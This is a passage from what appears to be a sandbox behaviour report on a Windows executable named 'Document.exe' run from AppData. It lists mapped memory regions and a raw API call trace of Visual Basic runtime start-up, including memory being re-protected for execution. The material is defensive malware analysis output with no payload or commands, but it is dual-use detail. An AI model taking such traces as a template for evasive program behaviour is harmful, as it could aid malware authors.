end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1567 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1568 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1569 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1570 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1571 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1572 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1573 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1574 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1575 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1576 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1604 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1605 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1606 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1616 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1617 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1618 start_va = 0x6c0000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1619 start_va = 0x850000 end_va = 0x1c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1620 start_va = 0x280000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1621 start_va = 0x1c50000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1622 start_va = 0x2050000 end_va = 0x231efff entry_point = 0x2050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1623 start_va = 0x2320000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1624 start_va = 0x2320000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1625 start_va = 0x2430000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 1626 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1627 start_va = 0x2470000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 1630 start_va = 0x2470000 end_va = 0x254efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 1631 start_va = 0x25e0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1632 start_va = 0x23a0000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1633 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1635 start_va = 0x757f0000 end_va = 0x7584efff entry_point = 0x757f0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1644 start_va = 0x2620000 end_va = 0x2a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 1645 start_va = 0x757d0000 end_va = 0x757e5fff entry_point = 0x757d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1646 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1647 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1648 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1649 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1650 start_va = 0x230000 end_va = 0x26bfff entry_point = 0x230000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1651 start_va = 0x75790000 end_va = 0x757cafff entry_point = 0x75790000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1652 start_va = 0x2550000 end_va = 0x25cffff entry_point = 0x2550000 region_type = mapped_file name = "~df8f3ab6037267860d.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DF8F3AB6037267860D.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~df8f3ab6037267860d.tmp") Region: id = 1653 start_va = 0x2a20000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 1654 start_va = 0x751f0000 end_va = 0x75202fff entry_point = 0x751f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1655 start_va = 0x230000 end_va = 0x236fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1656 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1657 start_va = 0x2aa0000 end_va = 0x2e92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002aa0000" filename = "" Region: id = 1658 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1659 start_va = 0x755f0000 end_va = 0x7578dfff entry_point = 0x755f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1660 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1661 start_va = 0x260000 end_va = 0x260fff entry_point = 0x260000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1662 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 1663 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1664 start_va = 0x2ea0000 end_va = 0x37cffff entry_point = 0x2ea0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1665 start_va = 0x260000 end_va = 0x260fff entry_point = 0x260000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1666 start_va = 0x260000 end_va = 0x260fff entry_point = 0x260000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1667 start_va = 0x37d0000 end_va = 0x38cffff entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 1668 start_va = 0x38d0000 end_va = 0x3a79fff entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 1669 start_va = 0x75f90000 end_va = 0x75f94fff entry_point = 0x75f90000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1670 start_va = 0x260000 end_va = 0x261fff entry_point = 0x260000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1671 start_va = 0x38d0000 end_va = 0x3975fff entry_point = 0x38d0000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 1692 start_va = 0x38d0000 end_va = 0x3a79fff entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 1709 start_va = 0x260000 end_va = 0x261fff entry_point = 0x260000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1710 start_va = 0x38d0000 end_va = 0x3975fff entry_point = 0x38d0000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Thread: id = 75 os_tid = 0x94c [0192.490] GetVersion () returned 0x1db10106 [0192.491] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76220000 [0192.492] GetProcAddress (hModule=0x76220000, lpProcName="IsTNT") returned 0x0 [0192.492] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1c50000 [0192.492] VirtualAlloc (lpAddress=0x1c50000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c50000 [0192.494] GetCurrentThreadId () returned 0x94c [0192.494] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0192.494] GetEnvironmentStringsW () returned 0x5d4620* [0192.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1501, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1501 [0192.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1501, lpMultiByteStr=0x2d07d0, cbMultiByte=1501, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1501 [0192.494] FreeEnvironmentStringsW (penv=0x5d4620) returned 1 [0192.494] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0192.494] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0192.494] GetFileType (hFile=0x0) returned 0x0 [0192.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0192.494] GetFileType (hFile=0x0) returned 0x0 [0192.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0192.494] GetFileType (hFile=0x0) returned 0x0 [0192.494] SetHandleCount (uNumber=0x20) returned 0x20 [0192.494] GetACP () returned 0x4e4 [0192.494] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0192.494] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.496] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76220000 [0192.496] GetProcAddress (hModule=0x76220000, lpProcName="IsProcessorFeaturePresent") returned 0x76235235 [0192.496] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0192.498] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x78 [0192.498] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x7c [0192.498] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0192.498] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0192.498] GetVersion () returned 0x1db10106 [0192.499] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0192.502] GetUserDefaultLCID () returned 0x409 [0192.502] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0192.502] GetSystemMetrics (nIndex=5) returned 1 [0192.502] GetSystemMetrics (nIndex=6) returned 1 [0192.502] GetSystemMetrics (nIndex=11) returned 32 [0192.502] GetSystemMetrics (nIndex=12) returned 32 [0192.502] GetSystemMetrics (nIndex=34) returned 132 [0192.502] GetSystemMetrics (nIndex=35) returned 38 [0192.502] GetSystemMetrics (nIndex=0) returned 1440 [0192.502] GetSystemMetrics (nIndex=1) returned 900 [0192.502] GetSystemMetrics (nIndex=32) returned 8 [0192.502] GetSystemMetrics (nIndex=33) returned 8 [0192.502] GetSystemMetrics (nIndex=42) returned 0 [0192.502] GetStockObject (i=15) returned 0x188000b [0192.503] GetStockObject (i=7) returned 0x1b00017 [0192.503] GetStockObject (i=6) returned 0x1b00018 [0192.503] GetStockObject (i=8) returned 0x1b00016 [0192.503] GetStockObject (i=4) returned 0x1900011 [0192.503] GetStockObject (i=2) returned 0x1900012 [0192.503] GetStockObject (i=0) returned 0x1900010 [0192.503] GetStockObject (i=5) returned 0x1900015 [0192.503] GetStockObject (i=13) returned 0x18a002e [0192.503] GetDC (hWnd=0x0) returned 0x4d01099b [0192.513] GetTextExtentPointA (in: hdc=0x4d01099b, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0192.515] GetDeviceCaps (hdc=0x4d01099b, index=14) returned 1 [0192.515] GetDeviceCaps (hdc=0x4d01099b, index=12) returned 32 [0192.515] GetDeviceCaps (hdc=0x4d01099b, index=88) returned 96 [0192.515] GetDeviceCaps (hdc=0x4d01099b, index=90) returned 96 [0192.515] GetDeviceCaps (hdc=0x4d01099b, index=38) returned 32409 [0192.515] ReleaseDC (hWnd=0x0, hDC=0x4d01099b) returned 1 [0192.516] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x75e366bc) returned 0x0 [0192.516] GetCurrentThreadId () returned 0x94c [0192.516] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0192.516] GetCurrentThreadId () returned 0x94c [0192.516] GetCurrentThreadId () returned 0x94c [0192.516] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" [0192.516] lstrlenA (lpString="") returned 0 [0192.516] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0192.517] SetErrorMode (uMode=0x8001) returned 0x0 [0192.517] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0192.517] GetUserDefaultLCID () returned 0x409 [0192.517] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0192.517] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0192.519] GetSystemDefaultLCID () returned 0x409 [0192.519] GetUserDefaultLCID () returned 0x409 [0192.519] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0192.519] GetStockObject (i=13) returned 0x18a002e [0192.520] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0192.520] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0192.520] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0192.520] lstrlenA (lpString="{xx}") returned 4 [0192.520] lstrlenA (lpString="VB98.CHM") returned 8 [0192.520] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0192.520] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0192.520] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0192.520] lstrlenA (lpString="{xx}") returned 4 [0192.520] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0192.520] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0192.520] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.520] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0192.520] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0192.520] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0192.520] lstrcpyA (in: lpString1=0x23617b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0192.520] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\ROAMING\\DOCUMENT\\DOCUMENT.EXE") returned 56 [0192.522] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0192.522] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0192.522] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?ROAMING?DOCUMENT?DOCUMENT.EXE") returned 0x90 [0192.522] GetLastError () returned 0x0 [0192.522] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0192.522] OleInitialize (pvReserved=0x0) returned 0x0 [0192.564] OaBuildVersion () returned 0x321396 [0192.564] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x76720000 [0192.564] GetLastError () returned 0x0 [0192.564] GetProcAddress (hModule=0x76720000, lpProcName="OleLoadPictureEx") returned 0x767870a1 [0192.564] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc141 [0192.564] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ad [0192.564] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0192.565] RegisterClassA (lpWndClass=0x18fc34) returned 0xc1bf [0192.565] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0192.565] RegisterClassA (lpWndClass=0x18fc34) returned 0xc1c0 [0192.565] GetUserDefaultLCID () returned 0x409 [0192.566] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0192.566] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x220000 [0192.566] VirtualAlloc (lpAddress=0x220000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.566] VirtualAlloc (lpAddress=0x220000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.566] VirtualAlloc (lpAddress=0x220000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.566] VirtualAlloc (lpAddress=0x220000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.566] VirtualAlloc (lpAddress=0x220000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.567] VirtualAlloc (lpAddress=0x220000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0192.567] VirtualProtect (in: lpAddress=0x220000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0192.567] GetCurrentProcess () returned 0xffffffff [0192.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x220000, dwSize=0x6000) returned 1 [0192.567] GlobalAddAtomA (lpString="VBDisabled") returned 0xc11d [0192.567] GetVersion () returned 0x1db10106 [0192.567] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="DispCallFunc") returned 0x76733dcf [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="LoadTypeLibEx") returned 0x767307b7 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="UnRegisterTypeLib") returned 0x76751ca9 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="CreateTypeLib2") returned 0x76738e70 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromUdate") returned 0x76737684 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="VarUdateFromDate") returned 0x7673cc98 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="GetAltMonthNames") returned 0x7676903a [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="VarNumFromParseNum") returned 0x76736231 [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="VarParseNumFromStr") returned 0x76735fea [0192.568] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromR4") returned 0x76743f94 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromR8") returned 0x76744e9e [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromDate") returned 0x7676db72 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromI4") returned 0x76752a8c [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="VarDecFromCy") returned 0x7676d737 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromDec") returned 0x7676e015 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7676cc3d [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="GetRecordInfoFromGuids") returned 0x7676d1c4 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayGetRecordInfo") returned 0x7676d48c [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="SafeArraySetRecordInfo") returned 0x7676d4c6 [0192.569] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayGetIID") returned 0x7676d509 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="SafeArraySetIID") returned 0x7673e7bb [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayCopyData") returned 0x7673e496 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7673ddf1 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="SafeArrayCreateEx") returned 0x7676d53f [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarFormat") returned 0x76772055 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatDateTime") returned 0x767720ea [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatNumber") returned 0x76772151 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatPercent") returned 0x767721f5 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarFormatCurrency") returned 0x76772288 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarWeekdayName") returned 0x76772335 [0192.570] GetProcAddress (hModule=0x76720000, lpProcName="VarMonthName") returned 0x767723d5 [0192.571] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0192.571] GetProcAddress 